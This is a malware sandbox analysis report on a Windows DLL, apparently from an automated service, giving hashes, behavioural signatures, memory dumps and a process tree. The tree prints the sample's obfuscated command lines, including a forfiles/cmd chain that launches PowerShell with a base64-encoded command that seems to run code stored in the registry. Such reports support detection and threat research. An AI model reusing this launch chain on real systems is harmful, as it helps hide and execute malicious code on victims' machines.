Overview

overview

10

Static

static

be294b6fac...d2.dll

windows7_x64

10

be294b6fac...d2.dll

windows10_x64

8

Resubmissions

18-03-2021 22:02

210318-wg14eesjje 10

13-11-2020 10:22

201113-ycmfkdqrdn 10

Analysis

  • max time kernel
    93s
  • max time network
    134s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    13-11-2020 10:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    be294b6faca17e762d1722ea1e447a3ad3a57b4c110cfe8ff515e3d2047c5ad2.dll

  • Size

    136KB

  • MD5

    fe590fd117449bce4bfad57d36bfc099

  • SHA1

    a5c3d7738ebc1f1ce8353e135b8dcea17155077b

  • SHA256

    be294b6faca17e762d1722ea1e447a3ad3a57b4c110cfe8ff515e3d2047c5ad2

  • SHA512

    f8e39f1e83dd666fff67161864c75057a0f6b4ad1692f0013f0aef47d69ed350662f0784555a72fcdb34bb5937371c7d75010639d5ae31c32d7383ee10a6605b

Score
8/10

Malware Config

Signatures

  • Blacklisted process makes network request 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 28 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:2868
      • C:\Windows\system32\rundll32.exe
        rundll32.exe C:\Users\Admin\AppData\Local\Temp\be294b6faca17e762d1722ea1e447a3ad3a57b4c110cfe8ff515e3d2047c5ad2.dll,#1
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:640
        • C:\Windows\SysWOW64\rundll32.exe
          rundll32.exe C:\Users\Admin\AppData\Local\Temp\be294b6faca17e762d1722ea1e447a3ad3a57b4c110cfe8ff515e3d2047c5ad2.dll,#1
          3⤵
          • Blacklisted process makes network request
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:996
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATgBlAHQAaQBkACcAKQAuAFQA & exit" /p C:\Windows\system32 /s /m po*l.e*e
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1836
        • C:\Windows\system32\forfiles.exe
          forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATgBlAHQAaQBkACcAKQAuAFQA & exit" /p C:\Windows\system32 /s /m po*l.e*e
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1864
          • C:\Windows\system32\cmd.exe
            /k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATgBlAHQAaQBkACcAKQAuAFQA & exit
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2052
            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATgBlAHQAaQBkACcAKQAuAFQA
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2128
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\15pcfqs2\15pcfqs2.cmdline"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:4012
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6429.tmp" "c:\Users\Admin\AppData\Local\Temp\15pcfqs2\CSCDAEE5FC6489A4EFC9D6F70A4B78334CA.TMP"
                  7⤵
                    PID:2304
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\eak03o5o\eak03o5o.cmdline"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2808
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6543.tmp" "c:\Users\Admin\AppData\Local\Temp\eak03o5o\CSC8F5B777C759A49EBAA7949676E152E2F.TMP"
                    7⤵
                      PID:3856
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
          1⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1492
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1492 CREDAT:82945 /prefetch:2
            2⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:3456

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/996-30-0x0000000004310000-0x0000000004328000-memory.dmp

          Filesize

          96KB

          Download

        • memory/996-1-0x0000000004720000-0x0000000004732000-memory.dmp

          Filesize

          72KB

          Download

        • memory/2128-9-0x00007FF9E63D0000-0x00007FF9E6DBC000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/2128-19-0x000002711B390000-0x000002711B391000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2128-10-0x000002711B340000-0x000002711B341000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2128-27-0x000002711B3A0000-0x000002711B3A1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2128-28-0x0000027136020000-0x0000027136038000-memory.dmp

          Filesize

          96KB

          Download

        • memory/2128-11-0x0000027136080000-0x0000027136081000-memory.dmp

          Filesize

          4KB

          Download